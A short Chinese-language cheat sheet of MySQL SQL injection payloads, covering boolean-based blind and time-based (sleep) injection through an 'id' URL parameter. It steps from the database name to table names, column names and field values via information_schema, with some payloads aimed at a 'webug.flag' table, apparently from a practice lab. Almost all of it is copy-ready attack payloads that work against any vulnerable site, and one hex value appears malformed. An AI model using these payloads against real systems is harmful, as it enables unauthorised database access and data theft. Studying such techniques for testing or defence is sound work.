布尔盲注：

格式：?id=1' and (ascii(substr((爆表列字段的语句 limit 0,1),1,1)))=100 --+

爆库：?id=1' and ord(substr(database(), 1, 1))=115 --+

爆表：?id=1' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)))=100 --+

?id=1' and (ascii(substr((select group_concat(TABLE_NAME) from information_schema.TABLES where TABLE_SCHEMA=0x674657374 limit 0,1),1,1)))=100 --+

爆列：?id=1' and (ascii(substr((select group_concat(COLUMN_NAME) from information_schema.COLUMNS where TABLE_SCHEMA=0x74657374（库名） and TABLE_NAME=0x61646d696e（表名） limit 0,1),1,1)))=100 --+            limit 0,1),4,1)))=102 含义：第4个的ascii码是102  所以应该是f

爆字段：?id=1' and (ascii(substr((select group_concat(concat(id,0x20,flag,0x20)) from webug.flag limit 0,1),1,1)))=100 --+

延时注入：

格式：?id=1' and if( (ascii(substr(( 爆表列字段语句 limit 0,1),1,1)))=100 ,sleep(5),0)--+

爆库：?id=1' and if(ord(substr(database(),1,1))=115,sleep(5),0) --+

爆表：?id=1' and if( (ascii(substr((select group_concat(TABLE_NAME) from information_schema.TABLES where TABLE_SCHEMA=0x674657374（表名） limit 0,1),1,1)))=100 ,sleep(5),0)--+

爆列：?id=1' and if( (ascii(substr(( select group_concat(COLUMN_NAME) from information_schema.COLUMNS where TABLE_SCHEMA="webug" and TABLE_NAME="flag" limit 0,1),1,1)))=105 ,sleep(5),0)--+

select group_concat(COLUMN_NAME) from information_schema.COLUMNS where TABLE_SCHEMA=0x74657374（库名） and TABLE_NAME=0x61646d696e（表名）

爆字段：?id=1' and if((ascii(substr((select group_concat(concat(id,0x20,flag,0x20)) from webug.flag limit 0,1),1,1)))<100,sleep(5),0)--+

select group_concat(concat(id,0x20,flag,0x20)) from 库.表

ord：返回字符串首个字符的ASCII值

substr：返回截取的字符串 start必须写，length可以不写，默认到字符串结尾

limit：限制查询结果返回的数量